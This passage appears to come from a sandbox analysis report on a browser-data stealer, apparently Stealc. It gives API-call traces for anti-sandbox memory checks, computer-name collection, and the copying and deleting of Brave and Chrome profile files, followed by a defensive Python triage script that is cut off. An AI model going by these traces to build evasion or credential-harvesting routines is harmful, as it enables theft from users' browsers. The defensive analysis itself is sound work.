                          control_flow_graph 2798 621030-621055 GetCurrentProcess VirtualAllocExNuma 2799 621057-621058 ExitProcess 2798->2799 2800 62105e-62107b VirtualAlloc 2798->2800 2801 621082-621088 2800->2801 2802 62107d-621080 2800->2802 2803 6210b1-6210b6 2801->2803 2804 62108a-6210ab VirtualFree 2801->2804 2802->2801 2804->2803
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00621046
                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 0062104D
                          • ExitProcess.KERNEL32 ref: 00621058
                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 0062106C
                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 006210AB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                          • String ID:
                          • API String ID: 3477276466-0
                          • Opcode ID: 91ac3ae5a62ee08a61537c027a6bf4051dc66e93052c5409a7a0b9d606fdd8e1
                          • Instruction ID: 286ab706b998506cfb0cd1382a0fac13a7d5f4016a4f0a699c7cfc00916305aa
                          • Opcode Fuzzy Hash: 91ac3ae5a62ee08a61537c027a6bf4051dc66e93052c5409a7a0b9d606fdd8e1
                          • Instruction Fuzzy Hash: A201D171780314BBE7204A656C5AFAB77AEB795B12F208414F744E72C0DAB5AE008A64

                          Control-flow Graph

                          control_flow_graph 2805 63ee90-63eeb5 call 622930 2808 63eeb7-63eebf 2805->2808 2809 63eec9-63eecd call 626c40 2805->2809 2808->2809 2810 63eec1-63eec3 lstrcpy 2808->2810 2812 63eed2-63eee8 StrCmpCA 2809->2812 2810->2809 2813 63ef11-63ef18 call 622a20 2812->2813 2814 63eeea-63ef02 call 622a20 call 622930 2812->2814 2820 63ef20-63ef28 2813->2820 2824 63ef45-63efa0 call 622a20 * 10 2814->2824 2825 63ef04-63ef0c 2814->2825 2820->2820 2822 63ef2a-63ef37 call 622930 2820->2822 2822->2824 2829 63ef39 2822->2829 2825->2824 2828 63ef0e-63ef0f 2825->2828 2831 63ef3e-63ef3f lstrcpy 2828->2831 2829->2831 2831->2824
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063EEC3
                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 0063EEDE
                          • lstrcpy.KERNEL32(00000000,ERROR), ref: 0063EF3F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID: ERROR
                          • API String ID: 3722407311-2861137601
                          • Opcode ID: dac224252cc58ecb9114879c57012387dab811ed76fb482209ca58f5c1171ba7
                          • Instruction ID: 8ae8ce5eaae7060401f932fe8c8cc23f40c3d254690e2c9f1982e9f4d0632d3d
                          • Opcode Fuzzy Hash: dac224252cc58ecb9114879c57012387dab811ed76fb482209ca58f5c1171ba7
                          • Instruction Fuzzy Hash: C6216570A20657ABCBA1FF79EC5669E37A6AF10301F00556CB84ACBA46DE31DC408FD4

                          Control-flow Graph

                          control_flow_graph 2886 6210c0-6210cb 2887 6210d0-6210dc 2886->2887 2889 6210de-6210f3 GlobalMemoryStatusEx 2887->2889 2890 621112-621114 ExitProcess 2889->2890 2891 6210f5-621106 2889->2891 2892 62111a-62111d 2891->2892 2893 621108 2891->2893 2893->2890 2894 62110a-621110 2893->2894 2894->2890 2894->2892
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitGlobalMemoryProcessStatus
                          • String ID: @
                          • API String ID: 803317263-2766056989
                          • Opcode ID: 2d60c572197999f5bb38c271b1e16352c104300ce00e31cc055ef7ed919189b8
                          • Instruction ID: 589f37165d09558e33526bdc22d58ebe8323109f67a177be2f108e71a8c57fd5
                          • Opcode Fuzzy Hash: 2d60c572197999f5bb38c271b1e16352c104300ce00e31cc055ef7ed919189b8
                          • Instruction Fuzzy Hash: 09F02E7010CA5487E7146A64FC0D71DF7DAE732351F100929DEDAC62C0E634C8509D37

                          Control-flow Graph

                          control_flow_graph 2895 638c88-638cc4 StrCmpCA 2898 638cc6-638cc7 ExitProcess 2895->2898 2899 638ccd-638ce6 2895->2899 2901 638ee2-638eef call 622a20 2899->2901 2902 638cec-638cf1 2899->2902 2904 638cf6-638cf9 2902->2904 2905 638ec3-638edc 2904->2905 2906 638cff 2904->2906 2905->2901 2940 638cf3 2905->2940 2908 638d06-638d15 lstrlen 2906->2908 2909 638d84-638d92 StrCmpCA 2906->2909 2910 638da4-638db8 StrCmpCA 2906->2910 2911 638e88-638e9a lstrlen 2906->2911 2912 638e6f-638e7d StrCmpCA 2906->2912 2913 638d30-638d3f lstrlen 2906->2913 2914 638e56-638e64 StrCmpCA 2906->2914 2915 638d5a-638d69 lstrlen 2906->2915 2916 638dbd-638dcb StrCmpCA 2906->2916 2917 638ddd-638deb StrCmpCA 2906->2917 2918 638dfd-638e0b StrCmpCA 2906->2918 2919 638e1d-638e2b StrCmpCA 2906->2919 2920 638e3d-638e4b StrCmpCA 2906->2920 2929 638d17-638d1c call 622a20 2908->2929 2930 638d1f-638d2b call 622930 2908->2930 2909->2905 2924 638d98-638d9f 2909->2924 2910->2905 2934 638ea4-638eb0 call 622930 2911->2934 2935 638e9c-638ea1 call 622a20 2911->2935 2912->2905 2933 638e7f-638e86 2912->2933 2936 638d41-638d46 call 622a20 2913->2936 2937 638d49-638d55 call 622930 2913->2937 2914->2905 2932 638e66-638e6d 2914->2932 2921 638d73-638d7f call 622930 2915->2921 2922 638d6b-638d70 call 622a20 2915->2922 2916->2905 2925 638dd1-638dd8 2916->2925 2917->2905 2926 638df1-638df8 2917->2926 2918->2905 2927 638e11-638e18 2918->2927 2919->2905 2928 638e31-638e38 2919->2928 2920->2905 2931 638e4d-638e54 2920->2931 2955 638eb3-638eb5 2921->2955 2922->2921 2924->2905 2925->2905 2926->2905 2927->2905 2928->2905 2929->2930 2930->2955 2931->2905 2932->2905 2933->2905 2934->2955 2935->2934 2936->2937 2937->2955 2940->2904 2955->2905 2956 638eb7-638eb9 2955->2956 2956->2905 2957 638ebb-638ebd lstrcpy 2956->2957 2957->2905
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: 81de52243041817074d8e2975de3c6e02833152d24b349527f216c1c9cacc6ea
                          • Instruction ID: 5f20c7500c314fc8014dc7e2ff0c0ea206b3241595e271178a71d7eadd35f5fa
                          • Opcode Fuzzy Hash: 81de52243041817074d8e2975de3c6e02833152d24b349527f216c1c9cacc6ea
                          • Instruction Fuzzy Hash: CBE0DF60904346EBDF009BB9CC899C6BF7CBF44711F0488A9FD494B255EA74AC05C3A5

                          Control-flow Graph

                          control_flow_graph 2958 642ad0-642b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2959 642b44-642b59 2958->2959 2960 642b24-642b36 2958->2960
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00642AFF
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00642B06
                          • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00642B1A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateComputerNameProcess
                          • String ID:
                          • API String ID: 1664310425-0
                          • Opcode ID: 72357002321d64c188bdce0dd3e81549b25e796e7d2240e56c4fdfed21fd8b96
                          • Instruction ID: f93886eff3b3331d241e2c577746efba11dfbf51a9788d695d70d0cf7602ed99
                          • Opcode Fuzzy Hash: 72357002321d64c188bdce0dd3e81549b25e796e7d2240e56c4fdfed21fd8b96
                          • Instruction Fuzzy Hash: 0A01D172A44708EBD710CF99EC45BAEFBB8F744B22F00026AF919E3780D778190487A1
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 006323D4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006323F7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00632402
                          • lstrlen.KERNEL32(\*.*), ref: 0063240D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063242A
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 00632436
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063246A
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00632486
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: same set of dumps as listed for the function above
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID: \*.*
                          • API String ID: 2567437900-1173974218
                          • Opcode ID: abf51c691cc42d061c890e75cdf227008c58f9d10ef5c9f54747fe7f642ac150
                          • Instruction ID: 3130bf44a85093153522f1b66b4d691941b4d7e8a6db5dd44d66e56f3742329d
                          • Opcode Fuzzy Hash: abf51c691cc42d061c890e75cdf227008c58f9d10ef5c9f54747fe7f642ac150
                          • Instruction Fuzzy Hash: E3A28D71901B27ABCB61AF65DCA9AEE77BABF04301F044128F849A7351DB38DD458F90
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 006216E2
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00621719
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062176C
                          • lstrcat.KERNEL32(00000000), ref: 00621776
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006217A2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006217EF
                          • lstrcat.KERNEL32(00000000,00000000), ref: 006217F9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00621825
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00621875
                          • lstrcat.KERNEL32(00000000), ref: 0062187F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006218AB
                          • lstrcpy.KERNEL32(00000000,?), ref: 006218F3
                          • lstrcat.KERNEL32(00000000,00000000), ref: 006218FE
                          • lstrlen.KERNEL32(00651794), ref: 00621909
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00621929
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00621935
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062195B
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00621966
                          • lstrlen.KERNEL32(\*.*), ref: 00621971
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062198E
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 0062199A
                            • Part of subcall function 00644040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 0064406D
                            • Part of subcall function 00644040: lstrcpy.KERNEL32(00000000,?), ref: 006440A2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006219C3
                          • lstrcpy.KERNEL32(00000000,?), ref: 00621A0E
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00621A16
                          • lstrlen.KERNEL32(00651794), ref: 00621A21
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00621A41
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00621A4D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00621A76
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00621A81
                          • lstrlen.KERNEL32(00651794), ref: 00621A8C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00621AAC
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00621AB8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00621ADE
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00621AE9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00621B11
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00621B45
                          • StrCmpCA.SHLWAPI(?,006517A0), ref: 00621B70
                          • StrCmpCA.SHLWAPI(?,006517A4), ref: 00621B8A
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00621BC4
                          • lstrcpy.KERNEL32(00000000,?), ref: 00621BFB
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00621C03
                          • lstrlen.KERNEL32(00651794), ref: 00621C0E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00621C31
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00621C3D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00621C69
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00621C74
                          • lstrlen.KERNEL32(00651794), ref: 00621C7F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00621CA2
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00621CAE
                          • lstrlen.KERNEL32(?), ref: 00621CBB
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00621CDB
                          • lstrcat.KERNEL32(00000000,?), ref: 00621CE9
                          • lstrlen.KERNEL32(00651794), ref: 00621CF4
                          • lstrcpy.KERNEL32(00000000,?), ref: 00621D14
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00621D20
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00621D46
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00621D51
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00621D7D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00621DE0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00621DEB
                          • lstrlen.KERNEL32(00651794), ref: 00621DF6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00621E19
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00621E25
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00621E4B
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00621E56
                          • lstrlen.KERNEL32(00651794), ref: 00621E61
                          • lstrcpy.KERNEL32(00000000,?), ref: 00621E81
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00621E8D
                          • lstrlen.KERNEL32(?), ref: 00621E9A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00621EBA
                          • lstrcat.KERNEL32(00000000,?), ref: 00621EC8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00621EF4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00621F3E
                          • GetFileAttributesA.KERNEL32(00000000), ref: 00621F45
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00621F9F
                          • lstrlen.KERNEL32(01298B40), ref: 00621FAE
                          • lstrcpy.KERNEL32(00000000,?), ref: 00621FDB
                          • lstrcat.KERNEL32(00000000,?), ref: 00621FE3
                          • lstrlen.KERNEL32(00651794), ref: 00621FEE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062200E
                          • lstrcat.KERNEL32(00000000,00651794), ref: 0062201A
                          • lstrcpy.KERNEL32(00000000,?), ref: 00622042
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0062204D
                          • lstrlen.KERNEL32(00651794), ref: 00622058
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00622075
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00622081
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: same set of dumps as listed for the functions above
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                          • String ID: \*.*
                          • API String ID: 4127656590-1173974218
                          • Opcode ID: 37ee8c2093b3ed6bb8b66c9cbdd6ce5d5e3328425b844795c52b0a643476afa8
                          • Instruction ID: 3a737db60c4740e13882fbf1893f5609cceaffb542a5e49ad4975b008b95355c
                          • Opcode Fuzzy Hash: 37ee8c2093b3ed6bb8b66c9cbdd6ce5d5e3328425b844795c52b0a643476afa8
                          • Instruction Fuzzy Hash: 7F928571901A27EBCB219F65EC99AEE77BBBF15301F040118F809A7255DB38DD458F90
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0062DBC1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DBE4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0062DBEF
                          • lstrlen.KERNEL32(00654CA8), ref: 0062DBFA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DC17
                          • lstrcat.KERNEL32(00000000,00654CA8), ref: 0062DC23
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DC4C
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0062DC8F
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0062DCBF
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 0062DCD0
                          • StrCmpCA.SHLWAPI(?,006517A0), ref: 0062DCF0
                          • StrCmpCA.SHLWAPI(?,006517A4), ref: 0062DD0A
                          • lstrlen.KERNEL32(0064CFEC), ref: 0062DD1D
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0062DD47
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DD70
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0062DD7B
                          • lstrlen.KERNEL32(00651794), ref: 0062DD86
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DDA3
                          • lstrcat.KERNEL32(00000000,00651794), ref: 0062DDAF
                          • lstrlen.KERNEL32(?), ref: 0062DDBC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DDDF
                          • lstrcat.KERNEL32(00000000,?), ref: 0062DDED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DE19
                          • lstrlen.KERNEL32(00651794), ref: 0062DE3D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062DE6F
                          • lstrcat.KERNEL32(00000000,00651794), ref: 0062DE7B
                          • lstrlen.KERNEL32(01298870), ref: 0062DE8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DEB0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0062DEBB
                          • lstrlen.KERNEL32(00651794), ref: 0062DEC6
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062DEE6
                          • lstrcat.KERNEL32(00000000,00651794), ref: 0062DEF2
                          • lstrlen.KERNEL32(01298BA0), ref: 0062DF01
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DF27
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0062DF32
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DF5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DFA5
                          • lstrcat.KERNEL32(00000000,00651794), ref: 0062DFB1
                          • lstrlen.KERNEL32(01298870), ref: 0062DFC0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DFE9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0062DFF4
                          • lstrlen.KERNEL32(00651794), ref: 0062DFFF
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062E022
                          • lstrcat.KERNEL32(00000000,00651794), ref: 0062E02E
                          • lstrlen.KERNEL32(01298BA0), ref: 0062E03D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062E063
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0062E06E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062E09A
                          • StrCmpCA.SHLWAPI(?,Brave), ref: 0062E0CD
                          • StrCmpCA.SHLWAPI(?,Preferences), ref: 0062E0E7
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0062E11F
                          • lstrlen.KERNEL32(0129CEA8), ref: 0062E12E
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062E155
                          • lstrcat.KERNEL32(00000000,?), ref: 0062E15D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062E19F
                          • lstrcat.KERNEL32(00000000), ref: 0062E1A9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062E1D0
                          • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0062E1F9
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0062E22F
                          • lstrlen.KERNEL32(01298B40), ref: 0062E23D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062E261
                          • lstrcat.KERNEL32(00000000,01298B40), ref: 0062E269
                          • lstrlen.KERNEL32(\Brave\Preferences), ref: 0062E274
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062E29B
                          • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 0062E2A7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062E2CF
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062E30F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062E349
                          • DeleteFileA.KERNEL32(?), ref: 0062E381
                          • StrCmpCA.SHLWAPI(?,0129CC50), ref: 0062E3AB
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062E3F4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062E41C
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062E445
                          • StrCmpCA.SHLWAPI(?,01298BA0), ref: 0062E468
                          • StrCmpCA.SHLWAPI(?,01298870), ref: 0062E47D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062E4D9
                          • GetFileAttributesA.KERNEL32(00000000), ref: 0062E4E0
                          • StrCmpCA.SHLWAPI(?,0129CC98), ref: 0062E58E
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0062E5C4
                          • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0062E639
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062E678
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062E6A1
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062E6C7
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062E70E
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062E737
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062E75C
                          • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0062E776
                          • DeleteFileA.KERNEL32(?), ref: 0062E7D2
                          • StrCmpCA.SHLWAPI(?,01298B50), ref: 0062E7FC
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062E88C
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062E8B5
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062E8EE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062E916
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062E952
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: same set of dumps as listed for the functions above
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                          • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                          • API String ID: 2635522530-726946144
                          • Opcode ID: 4a150f22e0a972388692e10b18dc763ac04d98a7ec14e823eb82406d01d02c50
                          • Instruction ID: 26b8a55f206452b2b414d31e963baf18fc504cd2509245a6d05d0ad03f991f0f
                          • Opcode Fuzzy Hash: 4a150f22e0a972388692e10b18dc763ac04d98a7ec14e823eb82406d01d02c50
                          • Instruction Fuzzy Hash: 16927F71910B26ABCB60EF65EC89AEE77BABF44301F044528F849A7351DB38DD458F90
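The four traces above all follow one shape: a path is assembled piecewise with lstrcpy/lstrcat, FindFirstFileA is called on it (with the \*.* wildcard where the report resolved the string), two StrCmpCA calls follow the find, and in the last record the entries are compared against Brave, Preferences and Google Chrome before CopyFileA and DeleteFileA run on them. The helper below is an added example, not code from the Joe Sandbox report or from the Stealc sample: it parses the "• api.MODULE(args), ref: ADDR" lines printed under each function's "APIs" heading, groups them per function, and labels that directory-walk / profile-copy pattern so a reviewer can skim a long report for the file-harvesting routines. The constructed SAMPLE_REPORT is an excerpt of lines taken from the records above (mixed across records to exercise every rule). Assumptions that are this example's own: the label names and the 15-call threshold; reading the two StrCmpCA calls right after FindFirstFileA as the usual "." / ".." skip (the report shows only the operand addresses 006517A0 and 006517A4, not their contents); the mapping of the second SHGetFolderPathA argument 0000001C to the documented constant CSIDL_LOCAL_APPDATA.

```python
"""Triage helper for the per-function API traces in a Joe Sandbox report.

Added example, not code from the report or from the Stealc sample. It parses
the "• api.MODULE(args), ref: ADDR" lines under each function's "APIs" heading,
groups them per function and labels directory-walk / profile-copy behaviour.
SAMPLE_REPORT is a constructed excerpt of lines copied from this report; the
label names and the lstrcpy/lstrcat threshold are this example's own choices.
"""
import re
from collections import Counter
from dataclasses import dataclass, field

# One API line as printed in the report, e.g. "• StrCmpCA.SHLWAPI(?,Brave), ref: 0062E0CD".
# Lines prefixed "Part of subcall function XXXXXXXX:" belong to a callee and are tagged.
API_LINE = re.compile(
    r"^\s*[•*-]?\s*(?P<sub>Part of subcall function [0-9A-Fa-f]{8}:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX_ARG = re.compile(r"^[0-9A-Fa-f]{8}$")
# Documented CSIDL values; 0x1C is what the SHGetFolderPathA subcall above passes.
CSIDL_NAMES = {0x1A: "CSIDL_APPDATA", 0x1C: "CSIDL_LOCAL_APPDATA"}


@dataclass
class FunctionTrace:
    first_ref: str                              # first call-site address, not the function start
    calls: list = field(default_factory=list)   # (api, module, args, ref, is_subcall)

    def literals(self):
        """Arguments the report resolved to strings (anything but an address or '?')."""
        return [a for _api, _mod, args, _ref, _sub in self.calls
                for a in args if a != "?" and not HEX_ARG.match(a)]

    def api_counts(self):
        return Counter(api for api, *_ in self.calls)


def parse_traces(text):
    """Split report text into per-function traces: "APIs" opens a record, "Strings" closes it."""
    traces, current = [], None
    for line in text.splitlines():
        if line.strip() in ("APIs", "Strings"):
            if current is not None:
                traces.append(current)
            current = None
            continue
        m = API_LINE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"].strip() else []
        if current is None:
            current = FunctionTrace(first_ref=m["ref"].upper())
        current.calls.append((m["api"], m["module"], args, m["ref"].upper(), bool(m["sub"])))
    if current is not None:
        traces.append(current)
    return traces


def classify(trace, build_threshold=15):
    """Label the behaviours a file-harvesting routine shows in its API trace."""
    counts, lits, labels = trace.api_counts(), trace.literals(), []
    apis = [c[0] for c in trace.calls]
    for api, _mod, args, _ref, _sub in trace.calls:
        if api == "SHGetFolderPathA" and len(args) > 1 and HEX_ARG.match(args[1]):
            labels.append("resolves-" + CSIDL_NAMES.get(int(args[1], 16), "CSIDL_" + args[1]))
    if counts["FindFirstFileA"]:
        labels.append("enumerates-directory")
    # Two StrCmpCA calls straight after FindFirstFileA: the usual "." / ".." skip of a
    # recursive walk. Inferred from call order only; the report shows just operand addresses.
    if any(api == "FindFirstFileA" and apis[i + 1:i + 3] == ["StrCmpCA"] * 2
           for i, api in enumerate(apis)):
        labels.append("skips-dot-entries")
    if counts["CopyFileA"]:
        labels.append("copies-files")
    if counts["DeleteFileA"]:
        labels.append("deletes-files")
    if counts["lstrcpy"] + counts["lstrcat"] >= build_threshold:
        labels.append("manual-path-building")   # paths assembled piecewise with lstrcpy/lstrcat
    return {"first_ref": trace.first_ref, "calls": len(trace.calls),
            "labels": labels, "targets": sorted(set(lits))}


def triage(text):
    return [classify(t) for t in parse_traces(text)]


# Constructed excerpt: lines copied from the function records in this report.
SAMPLE_REPORT = r"""
APIs
• lstrcpy.KERNEL32(00000000,0064CFEC), ref: 006323D4
• lstrcat.KERNEL32(00000000,\*.*), ref: 00632436
  • Part of subcall function 00644040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 0064406D
• FindFirstFileA.KERNEL32(00000000,?), ref: 00632486
Strings
APIs
• lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0062DBC1
• FindFirstFileA.KERNEL32(00000000,?), ref: 0062DCD0
• StrCmpCA.SHLWAPI(?,006517A0), ref: 0062DCF0
• StrCmpCA.SHLWAPI(?,006517A4), ref: 0062DD0A
• StrCmpCA.SHLWAPI(?,Brave), ref: 0062E0CD
• StrCmpCA.SHLWAPI(?,Preferences), ref: 0062E0E7
• CopyFileA.KERNEL32(00000000,?,00000001), ref: 0062E1F9
• lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 0062E2A7
• DeleteFileA.KERNEL32(?), ref: 0062E381
• StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0062E776
Strings
"""

if __name__ == "__main__":
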